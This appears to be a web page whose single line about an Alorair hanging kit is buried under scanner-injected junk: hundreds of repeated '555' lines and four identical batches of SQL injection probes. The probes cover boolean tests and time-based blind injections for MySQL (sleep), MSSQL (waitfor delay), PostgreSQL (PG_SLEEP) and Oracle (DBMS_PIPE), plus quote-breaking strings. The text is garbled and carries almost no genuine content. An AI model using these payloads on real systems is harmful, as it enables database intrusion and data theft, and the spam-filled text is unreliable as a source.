It depends on how it is built. You can also use the Alorair Hanging kit.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555sNeYow8v
555
-1 OR 2+168-168-1=0+0+0+1 --
-1 OR 2+112-112-1=0+0+0+1
-1' OR 2+707-707-1=0+0+0+1 --
-1' OR 2+273-273-1=0+0+0+1 or 'fEFLWCWa'='
-1" OR 2+663-663-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555PTQutQCM'; waitfor delay '0:0:15' --
555-1 OR 850=(SELECT 850 FROM PG_SLEEP(15))--
555-1) OR 656=(SELECT 656 FROM PG_SLEEP(15))--
555-1)) OR 241=(SELECT 241 FROM PG_SLEEP(15))--
5557htgkqiU' OR 646=(SELECT 646 FROM PG_SLEEP(15))--
555Jo6dZ1L8') OR 342=(SELECT 342 FROM PG_SLEEP(15))--
5554dMdMb1f')) OR 642=(SELECT 642 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555X9fvwRgt
555
-1 OR 2+676-676-1=0+0+0+1 --
-1 OR 2+951-951-1=0+0+0+1
-1' OR 2+203-203-1=0+0+0+1 --
-1' OR 2+200-200-1=0+0+0+1 or 'BeTftiBe'='
-1" OR 2+193-193-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555t1pLHRBi'; waitfor delay '0:0:15' --
555-1 OR 611=(SELECT 611 FROM PG_SLEEP(15))--
555-1) OR 89=(SELECT 89 FROM PG_SLEEP(15))--
555-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
5553HOoLqpU' OR 116=(SELECT 116 FROM PG_SLEEP(15))--
555SbG1nM4j') OR 237=(SELECT 237 FROM PG_SLEEP(15))--
555B8ZfQNOS')) OR 31=(SELECT 31 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555VXmQpGLa
555
-1 OR 2+645-645-1=0+0+0+1 --
-1 OR 2+261-261-1=0+0+0+1
-1' OR 2+171-171-1=0+0+0+1 --
-1' OR 2+704-704-1=0+0+0+1 or 'ipqX6cEV'='
-1" OR 2+22-22-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555GsVaur0J'; waitfor delay '0:0:15' --
555-1 OR 300=(SELECT 300 FROM PG_SLEEP(15))--
555-1) OR 222=(SELECT 222 FROM PG_SLEEP(15))--
555-1)) OR 256=(SELECT 256 FROM PG_SLEEP(15))--
555P1REODBg' OR 434=(SELECT 434 FROM PG_SLEEP(15))--
555pu8MGAnm') OR 680=(SELECT 680 FROM PG_SLEEP(15))--
555WGvhxucv')) OR 155=(SELECT 155 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555xh5NERh9
555
-1 OR 2+265-265-1=0+0+0+1 --
-1 OR 2+600-600-1=0+0+0+1
-1' OR 2+746-746-1=0+0+0+1 --
-1' OR 2+309-309-1=0+0+0+1 or '0zzjn4Vg'='
-1" OR 2+544-544-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555lKDt35p8'; waitfor delay '0:0:15' --
555-1 OR 406=(SELECT 406 FROM PG_SLEEP(15))--
555-1) OR 326=(SELECT 326 FROM PG_SLEEP(15))--
555-1)) OR 599=(SELECT 599 FROM PG_SLEEP(15))--
5559j14VzGz' OR 124=(SELECT 124 FROM PG_SLEEP(15))--
55526PQru4n') OR 672=(SELECT 672 FROM PG_SLEEP(15))--
555RjKlWMrE')) OR 443=(SELECT 443 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"